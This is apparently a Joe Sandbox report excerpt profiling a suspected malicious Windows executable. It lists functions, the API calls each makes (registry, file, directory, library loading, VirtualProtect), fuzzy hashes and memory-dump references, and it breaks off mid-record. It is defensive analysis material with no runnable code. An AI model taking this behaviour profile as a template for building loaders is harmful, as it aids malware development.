Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

Function 004024F8 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69

Function 004031D6 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9

Function 004015C1 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76133180,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76133180,00000000), ref: 00405D76
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962

SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID:
API String ID: 1892508949-0
Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D

Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz9A57.tmp,00000000,00000011,00000002), ref: 00402557

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D

Function 0040238E Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
RegCloseKey.ADVAPI32(00000000), ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D

Function 004067C2 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E

Function 00405EDE Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6ZoBPR3isG.exe,80000000,00000003), ref: 00405EE2
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15

Function 0040599C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D

Function 73F92AAC Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

EnumWindows.USER32(00000000), ref: 73F92B6B

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 87f2c647aa692e7994428f566428cfcd7090f006bb22e2fb2b1dcec2c831b0a5
Instruction ID: 6ea78e296e635364e52d00982b2cd00f1875377072fe8c41dda911b1998568ca
Opcode Fuzzy Hash: 87f2c647aa692e7994428f566428cfcd7090f006bb22e2fb2b1dcec2c831b0a5
Instruction Fuzzy Hash: 9E41A1B340020EFFFB21EF66DD91B5937A9EB443E4F324426E50ED6260D63594819B98

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E

Function 004027EF Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E

Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634

Function 00405F61 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4

Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040DCCE,0040CED0,004033DE,0040CED0,0040DCCE,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8

Function 73F92993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(73F9505C,00000004,00000040,73F9504C), ref: 73F929B1

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 979e5ffeed49ebfb4a2019cb2d7da0e2993f94398f2bc29dbfa7e046baddff00
Instruction ID: 4cd47a556cabf0a038b2e18a0170271fdd0a79276a649d6c7c46387331bc74b4
Opcode Fuzzy Hash: 979e5ffeed49ebfb4a2019cb2d7da0e2993f94398f2bc29dbfa7e046baddff00
Instruction Fuzzy Hash: 71F0A5F2905282DEE350EF2B88657093FE0B7593C4B27462AE19EE6271E3354045DF95

Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
